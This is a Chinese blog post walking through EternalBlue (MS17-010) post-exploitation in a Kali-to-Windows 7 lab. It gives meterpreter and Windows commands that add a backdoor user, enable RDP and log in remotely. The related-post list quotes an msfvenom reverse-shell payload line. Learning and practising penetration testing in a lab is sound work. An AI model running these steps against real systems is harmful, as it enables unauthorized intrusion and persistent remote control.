后渗透之永恒之蓝提权远程连接

最新推荐文章于 2023-09-08 20:25:23 发布
最新推荐文章于 2023-09-08 20:25:23 发布
阅读量1.4k 收藏 17
点赞数
分类专栏: 后渗透 文章标签: 服务器 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dl1286670932/article/details/127932439
版权

一、利用永恒之蓝(MS17-010)进行攻击

  1. 环境搭建:kali、Windows 7,其中WIN7为靶机。
  2. 永恒之蓝【Eternal Blue】爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
  3. 关于“SMB” ,SMB协议[Server Message Block]是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,网上邻居也是SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP协议的139端口和TCP445端口。

二、进入攻击阶段

 拿到权限后,screenshot,截取目标当前屏幕。 

run post/windows/gather/checkvm

查看目标主机是否在虚拟机中。

 net user hack(用户名) 123456(密码) /add

添加用户hack到目标主机中。

net user 可以看到hack用户成功建立。

 run post/windows/manage/enable_rdp

开启桌面远程连接。

rdesktpo 192.168.x.x(目标IP)。

 出现其他用户,用hack登录。

 成功登入,远程控制。

 

engDlin
关注
  • 0
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
永恒之蓝漏洞复现(二)对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接
wty923的博客
01-12 1865
对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接
浅谈MS17-010永恒之蓝漏洞利用(渗透,后渗透)
m0_70383208的博客
05-28 512
永恒之蓝作为一代人的回忆,如今已无法对当下主流windows系统构成威胁(主要是对win7 以上系统),但对win2008依然有可能构成(假定这个win2008服务器没有打上针对永恒之蓝的补丁).下面我们看一下,这个病毒曾经是如何潜伏进个人2008系统的. 入侵所需工具,Kali攻击机 2008靶机(确保靶机上没有针对永恒之蓝的补丁) 环境上:假定2008和服务器所处同一个网段内 首先我们需要打开kali 接着我们使用一款主动扫描工具nmap 看能否在kali上扫到这个目标主机 我们输入nmap
永恒之蓝,【17-010】漏洞复现,实现远程桌面连接,超详细步骤,小白必看
weixin_62490257的博客
06-29 3867
永恒之蓝,【17-010】漏洞复现,实现远程桌面连接,超详细步骤,小白必看
通过Kali利用永恒之蓝漏洞目标主机shell,并进行部分后渗透操作
weixin_60182338的博客
03-17 2797
渗透测试仅用于个人的学习以提升能力,不能用于非法的恶意攻击
浅谈MS17-010永恒之蓝漏洞利用(渗透,后渗透)2
m0_70383208的博客
05-28 491
接着上面的成功渗透的结果,我们可以看到一个meterpreter,我们可以输入命令查看当前用户信息 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 接着我们需要使用一个后渗透模块kiwi-后渗透阶段的一款利器. 输入load kiwi //加载kiwi,如下图 接下来我们需要进行进程迁移,先使用ps 查看当前进程 将 SYSTEM 权限 迁移为 Administrator meterpreter > ps
渗透基础笔记+作业(永恒之蓝复现)
09-08
总结起来,渗透测试是一个综合性的过程,涵盖了情报收集、威胁建模、漏洞分析、渗透攻击和后渗透操作,旨在全面评估系统的安全性。对于特定的漏洞如“永恒之蓝”,了解其工作原理和复现过程,对于提高网络安全防护至...
永恒之蓝(ms17010)漏洞检测工具
04-19
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以...
永恒之蓝测试.docx
07-23
永恒之蓝是 Windows 操作系统中的一个漏洞,通过这个漏洞,可以远程控制目标主机。 Nmap 扫描 首先,我们需要使用 Nmap 工具来扫描目标主机的开放端口和服务。命令为:`nmap –Pn –Sv –T4 IP 地址`,其中 `-Pn` ...
永恒之蓝ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。...
EternalBlue永恒之蓝渗透测试.html
03-02
永恒之蓝漏洞渗透测试
EternalBlue永恒之蓝渗透测试
AndyNoel的博客
03-05 517
Eternal Blue(永恒之蓝)-ms17-010渗透测试 第一次做的渗透测试,也是第一次去写博客,还望各位师傅多多指正 :) 工具 1.靶机系统 window7 开放445以及139端口 2.kali-Linux虚拟机 注意保证靶机与主机IP位于同一网段(可用ping命令进行检测) 0x01 更新metasploit 在kali终端输入msfconsole 然后输入apt-get install metaspolit-framework(要在root权限下,若不在,记得在命令前加入sudo,记得输入密
利用eternalblue远程控制win7桌面
2301_77925305的博客
06-10 499
三重套娃
渗透测试基础之永恒之蓝漏洞复现
最新发布
weixin_72543266的博客
09-08 1389
渗透测试(Penetration Testing)是指专业的安全测试人员模拟黑客攻击的行为,对目标系统进行主动攻击测试的过程。通过模拟攻击,渗透测试帮助企业评估其系统或网络的安全性,发现潜在的安全漏洞和弱点,从而提供相应的防护措施和改进建议。渗透测试的目的是帮助组织发现和修复系统中的安全漏洞,以提升安全性和防御能力。每日一言。
使用ms17-010永恒之蓝漏洞对win7进行渗透
qq_44774215的博客
11-13 4216
使用ms17-010永恒之蓝漏洞对win7进行渗透
永远的后门
hunix
01-22 251
[size=medium][size=small][/size] IIS是比较流行的www服务器,设置不当漏洞就很多。入侵iis服务器后留下后门,以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听,比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。不过一个比较防范严密的www站点(他们的管理员吃了苦头后)一般通过防火墙对端口进行限制,这样除了管...
永恒之蓝漏洞攻击实现提权
qq_45886782的博客
10-19 2085
实验步骤 DOS命令 批处理
模拟“永恒之蓝”攻击,实现系统提权
qq_61861243的博客
10-06 1700
模拟“永恒之蓝”攻击,实现系统提权
MS17-010(永恒之蓝)漏洞分析与复现并通过NC提权
weixin_49905950的博客
06-05 498
讲解如何利用永恒之蓝攻击 win2008 靶机并植入nc木马,让win7在开机启动注册表中添加内容,实现nc.exe开机自启。并在kali里面进行连接,验证上述操作是否成功。
永恒之蓝漏洞原理及漏洞复现
m0_66908617的博客
02-10 3105
摘要永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,、整个以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。上文提到了SMB协议。
如何使用ida分析永恒之蓝病毒
06-12
使用IDA分析永恒之蓝病毒,需要先获得病毒的二进制文件。一般情况下,我们可以从病毒样本中提取出可执行文件,然后使用IDA进行反汇编分析。 以下是使用IDA进行分析的步骤: 1. 打开IDA,点击File -> Open,选择病毒二进制文件进行加载。 2. IDA会对文件进行反汇编,显示出汇编代码。 3. 在IDA的左侧窗口中,可以看到程序的函数列表和各种数据。可以通过双击函数名或者数据项来查看具体的代码或数据。 4. 分析代码,查找病毒的入口点和主要功能,从而理解病毒的行为和传播方式。 5. 可以利用IDA的调试功能,对病毒进行动态分析。通过设置断点、单步执行等方式,观察程序的执行流程和变量的值,从而深入理解病毒的内部机制。 需要注意的是,病毒作者通常会对病毒进行混淆和加密,以增加分析的难度。因此,在分析过程中需要对IDA的反汇编结果进行仔细的分析和破解。此外,为了避免病毒的传播和感染,建议在安全的环境下进行分析,使用虚拟机隔离病毒的影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

engDlin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值